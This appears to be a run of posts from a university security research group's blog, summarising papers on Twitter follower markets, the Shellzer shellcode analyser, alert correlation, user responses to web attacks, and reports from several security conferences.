Poultry Markets: On the Underground Economy of Twitter Followers

Posted on May 4, 2012 by

Twitter has become such an important medium that companies and celebrities use it extensively to reach their customers and their fans. Nowadays, creating a large and engaged network of followers can determine the difference between succeeding and failing in marketing. However, creating such a network requires time, especially when the party building it does not have an established reputation among the public.

 For this reason, a number of websites to help Twitter users create a large network of followers have emerged. These websites promise their subscribers to provide followers in exchange for a fee. In addition, some of these services offer to spread promotional messages in the network. We call this phenomenon Twitter Account Markets. We study this phenomenon in our paper “Poultry Markets: On the Underground Economy of Twitter Followers”, that will appear at the SIGCOMM Workshop on Online Social Networks (WOSN) later this year.

 Typically, the services offered by a Twitter Account Market are accessible through a webpage. Customers can buy followers at a rate that is between $20 and $100 for 1,000 followers. In addition, markets typically offer the possibility of having content sent by a certain number of accounts, again in exchange for a fee.

All Twitter Account Markets we analyzed offer both “free” and “premium” versions of their services. While premium accounts pay for their services, the free ones gain followers by giving away their Twitter credentials (a clever way of phishing). Once the market administrator gets the credentials for an account, he can follow other Twitter accounts (that are free or premium customers of the market), or send out “promoted” content (typically spam). For convenience, the market administrator typically authorizes an OAUTH application by using his victim’s stolen credentials. By doing this, he can easily administer a large number of accounts, by leveraging the Twitter API.

 Twitter Account Markets are a big problem on Twitter: first, an account with an inflated number of followers tends to look more trustworthy to the other social network users. Second, these services introduce spam in the network.

 Of course, Twitter does not like this behavior. In fact, they introduced a clause in their Terms of Service that specifically forbids to participate in Twitter Account Markets operations. Twitter periodically suspends the OAuth applications that are used by Twitter Account Markets. However, since the market administrator has the credentials to his victims’ accounts, he can go and authorize a new application, and continue his operation.

 In our paper, we propose techniques to both detect Twitter Account Market victims and customers. We believe that an effective way of mitigating this problem would be to focus on the customers, rather than on the victims. Since participating in a Twitter Account Market violates the terms of service, Twitter could suspend such accounts, and impact the market from the economic side.

Posted in Social Networks | Leave a comment

Shellzer: a tool for the dynamic analysis of malicious shellcode

Posted on January 10, 2012 by

Last September, I presented Shellzer at RAID 2011 conference. Shellzer is a tool that I developed back in August 2010, that aims to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples that have been collected by running Wepawet during these years. Due to the size of our dataset (about 30,000 shellcode samples at that time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a python Win32 debugging abstraction class. By using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted in single-step executing the whole shellcode binary. This resulted in having the complete control over the sample’s execution, and being the shellcode a malicious piece of code, it was an ideal feature. But unfortunately, this approach is not feasible to be used in practice. In fact, the number of assembly instructions that have to be executed at run-time is in the order of millions, even if shellcode is commonly few hundreds of bytes long. This is due to the fact that many loops are present, and some of them are executed thousands of times. Moreover, Windows API functions are invoked by the shellcode. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis was consequently lasting several minutes in average.

My research has been focused to find how to avoid to single-step the whole shellcode’s execution, while maintaining the complete control over it. This has proved to be challenging, due to the many evasion techniques that are used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists in the detailed trace of the Windows API functions called (with their parameters and return value), the Windows DLLs that have been loaded, and the list of the URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, other than those detected in web-based drive-by-download attacks.

Starting from November 2011, this tool started to be used by Wepawet. When a shellcode is detected, it will be automatically forwarded to the shellcode analyzer and the Shellzer’s report will be included in the main Wepawet’s report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If after submitting a sample to Wepawet, a shellcode is detected and you don’t see the additional shellcode information, it means that something went wrong. Please, don’t hesitate to contact us in case of errors: we need your feedback!

Posted in Binary Analysis, Web Security | Leave a comment

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Posted on December 20, 2011 by

Last month I was invited to Cali’s SecurityZone for the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known and strong international security experts for a 2+1 days of conference in a DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson have animated the event by talking of cyberwar attacks, compliance, read team testing and threats modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia, UK, USA, Venezuela, Brazil, Argentina, and Mexico, and over 2400 people were connected via streaming.

But the SecurityZone’s success is not only a matter of numbers: Among the many conferences I have been in these last days, SecurityZone has been certainly one of the best for their people. The organizers did an excellent job in putting together this event. I won’t forget their cordiality, kindness, friendly and always smiling attitude. At the same time, our attendees were hungry of knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012, and in the meanwhile follow us on Twitter!

Posted in Conferences | Leave a comment

About Nexat paper in ACSAC 2011

Posted on December 13, 2011 by

Last week, our group attended ACSAC 2011. The conference was held in Buena Vista Palace, Orlando, Florida. I presented Nexat paper, and the feedbacks were encouraging.

Nexat was a research project in collaboration with Casey Cipriano, and Amir Houmansadr. Nexat tries to solve a problem a typical security administrator nowadays faces. The security administrators are normally overwhelmed with the amount of security alerts their monitoring tools generate. They also cannot keep up with the stream of the events and predict the next security related events. Therefore, the administrators are usually reactive.

The reason for this problem is that the battlefield of security is not even. A simple button hit by an attacker may cause thousands of alerts to be generated on administrators side. Nexat tries to even the field by deducing relationship between different sets of alerts. Nexat is able to detect related alerts (alerts which may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets the administrators to be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attack as long as they are composed of detectable steps. We used the alerts generated by Snort in iCTF 2008.

Posted in Systems Security | Leave a comment

Insights into User Behavior in Dealing with Internet Attacks

Posted on November 22, 2011 by

At last, we finalized analyzing the data from the user experiments we had conducted earlier this year, and collected the results in the paper “Insights into User Behavior in Dealing with Internet Attacks”, that is going to appear at NDSS, in February 2012.

Many Internet attacks have a strong human aspect; they require some sort of user interaction, such as clicking on a malicious link. In order to understand how users cope with these attacks, and how they judge the security implications of the actions they take, we built an online security test platform and conducted experiments with over 160 Internet users, with diverse backgrounds and technical sophistication. We presented the participants with concrete security scenarios exemplifying prevalent attacks such as XSS, link manipulation tricks and file sharing scams, and observed their decisions.

To very briefly summarize some of our interesting findings:

  • Non-technical users largely failed to recognize threats, and assess the consequences of their actions. Interestingly, they were still able to avert relatively simple attacks solely based on their intuition, and frequent exposure to similar situations in the past.
  • Many users treated the ‘length’ of URLs as a sign of maliciousness. They avoided long and complicated URLs claiming those look suspicious, but followed shorter (but malicious!) links. Analogously, users often made misinformed decisions based on the ‘size’ of files.
  • Non-technical users were mostly unaware of how shortened URLs (e.g., TinyURL) work; none of them reported knowing how to check the real link destinations.
  • Trick banners commonly found in file sharing sites had a high success rate of tricking the participants, even those who were tech-savvy.

I would like to prompt you to read the paper if you are interested in the details of the tests, and our analysis & discussion of the results. I would also like to give my thanks to everyone who participated in our tests!

Posted in Web Security | Leave a comment

Report from RAID 2011

Posted on October 18, 2011 by

A few weeks ago we attended the 14th Recent Advances in Intrusion Detection (RAID) Symposium in Menlo Park, California. The conference was held at SRI International and featured 20 talks about malware, application security, anomaly detection and network security.

Our group presented three papers: Yanick talked about Shellzer, a tool for the dynamic analysis of malicious shellcode, which will soon be integrated with Wepawet. Bob presented Dymo, a system that provides a dynamic code identity primitive that tracks the run-time integrity of a process and can also produce labels for network packets to distinguish between legitimate and malicious network activity.

I talked about Disarm, which I developed together with Paolo and Clemens for my Master degree at the Vienna University of Technology. Operating the dynamic malware analysis sandbox Anubis we are very interested in detecting environment-sensitive malware that is capable of fingerprinting Anubis and evading the analysis. Disarm therefore automates the screening of malware samples for evasive behavior and helped us discover several evasion techniques used by malware against Anubis (and also other dynamic analysis sandboxes).

I was pleased with the positive feedback and interest in our work and thoroughly enjoyed the conference, especially meeting colleagues from UCSB and the Institute Eurécom and other experts from the security community.

Posted in Conferences | Leave a comment

Report from the USENIX Security Symposium 2011

Posted on August 19, 2011 by

Last week we attended the 20th USENIX Security Symposium in San Francisco. Taking advantage of the high availability of travel grants and of the fact that the conference was close to Santa Barbara, we packed a minivan with people and drove up north.

As a group, we presented two papers at the conference. I gave my talk on BotMagnifier, about which I already blogged in the past. The paper was well received by the audience, and I had many questions asked, some of which will help improving the system for future work. The other paper our group presented was  JACKSTRAWS: Picking Command and Control Connections from Bot Traffic. Gregoire presented this paper, which is a collaboration between UCSB and our colleagues at Ruhr University Bochum. In this paper they presented Jackstrows, a system that is able to identify C&C connections and, by using machine learning techniques, builds models of such connections, with the goal of matching such behaviors with the models generated by unknown bots.

The level of the conference was really good, and we attended to several interesting talks.  Manos Antonakakis presented a system for detecting domains used by malware by looking at the upper DNS hierarchy. This approach is very similar to the EXPOSURE system developed by our group, but is operating at a higher level. Another interesting talk was given by Chris Grier. They infiltrated 4 large pay-per-install services and studied the dynamics and the market behind malware droppers. I also enjoyed the talk by Edward Schwartz, who presented Q, a system that automatically builds ROP payloads for vulnerable binaries. However, a problem with this paper is that while it does a good job in showing how existing defenses can be bypassed by using ROP, it is not as successful in discussing the efforts made by the research community for fighting such attacks. For example, the paper  ”G-Free: Defeating Return-Oriented Programming through Gadget-less Binaries”, which had been published by our group last year and provided a defense against ROP is not even mentioned in their related work discussion.

Posted in Conferences | Leave a comment